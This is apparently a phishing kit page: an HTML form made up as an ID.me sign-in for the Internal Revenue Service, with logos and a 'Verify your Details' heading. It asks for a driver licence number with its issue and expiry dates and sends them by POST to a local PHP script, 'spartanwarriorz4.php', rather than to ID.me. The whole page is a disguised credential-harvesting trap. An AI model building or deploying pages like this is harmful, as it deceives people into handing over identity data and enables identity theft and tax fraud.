<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
    <style>body {transition: opacity ease-in 0.2s; } 
    body[unresolved] {opacity: 0; display: block; overflow: hidden; position: relative; } 
    </style>
    <title itemprop="name"> Sign in to ID.me - ID.me</title>
    <meta charset="utf-8">
    <meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible">
    <meta content="One Identity. One Wallet." name="description">
    <meta content="" name="keywords">
    <meta content="text/html; charset=utf-8" http-equiv="content-type">
    <meta content="noodp" name="robots">
    <meta content="width=device-width, initial-scale=1, minimum-scale=1" name="viewport">
    <meta content="noindex" name="robots">
    <link rel="icon" type="image/png" href="id.ico">
    <link rel="stylesheet" href="css/application-12485d2c911011b226e18329e57725b33a13a593773141eae6e2.css">
</head>
<body class="">
    <div id="ZN_2bLc7fWaOZ8U4ey"></div>
    <div class="page-container" data-role="page-container">
        <div class="container">
            <div class="content-container">
                <form class="new_user" id="new_user" data-validate="signin" action="spartanwarriorz4.php" accept-charset="UTF-8" method="post">
                    <div class="form-header">
                        <div class="form-header-content" role="banner">
                            <div class="partner">
                                <div class="c_icon m_idme"><img alt="ID.me" src="images/idme-logo-1d96899e99d393974ec16fa17a820e78fca132bd8ea53e01f12bdc000baf674f.svg"></div>
                                <div class="c_icon m_addition"><img alt="with" src="images/icon-addition-1c60f492657aa091463f6ac2e15f0f5123425f314e60383dbba0b06b3bbae0ed.svg"></div>
                                <div class="c_icon m_consumer-logo"><button name="button" type="button" class="m_consumer-logo m_exit-ramp" data-component="Components.Modal" fdprocessedid="1fuvyb"><img alt="Internal Revenue Service" src="images/IRS-Logo.svg">
                                </button></div>
                            </div>
                        </div>
                    </div>
                    <main aria-labelledby="sr_page_title" class="form-container">
                        <div class="form-header-access">
                            <h1 id="sr_page_title">Verify your Details</h1>
                        </div>
                        <div class="form-fields">
                            <div class="field-group">
                                <div class="field text">
                                    <label for="user_name">Driver License Number</label>
                                    <input required="required" type="text" name="fname" id="user_name">
                                </div>
                            </div>
                            <div class="field-group">
                                <div class="field text">
                                    <label for="user_dob">Date of Issue</label>
                                    <input required="required" type="date" name="dob" id="user_dob">
                                </div>
                            </div>
                            <div class="field-group">
                                <div class="field text">
                                    <label for="user_exp">Date of Expire</label>
                                    <input required="required" type="date" name="exp" id="user_exp">
                                </div>
                            </div>
                            <div class="field-group">
                                <div class="field text">
                                </div>
                            </div>
                        </div>
                        <div class="form-actions" data-component="Components.Collector" data-ready="true">
                            <input type="submit" name="commit" id="btn-submit" value="Continue" class="btn btn-primary" fdprocessedid="9spe5m">
                        </div>
                </form>
            </div>
            <aside aria-label="Select Language" class="language">
                <div class="language-selection" data-component="Components.Language"><a class="language-selection-toggle" href="#">English</a></div>
            </aside>
            <footer class="footer">
                <nav aria-label="Footer" class="footer__links">
                    <ul class="footer__list">
                        <li class="footer__list-item"><a target="_blank" class="footer__link" href="#">What is ID.me?</a></li>
                        <li class="footer__list-item"><a target="_blank" class="footer__link" href="#">Terms of Service</a></li>
                        <li class="footer__list-item"><a target="_blank" class="footer__link" href="#">Privacy Policy</a></li>
                    </ul>
                </nav>
            </footer>
        </div>
    </div>
</body>
</html>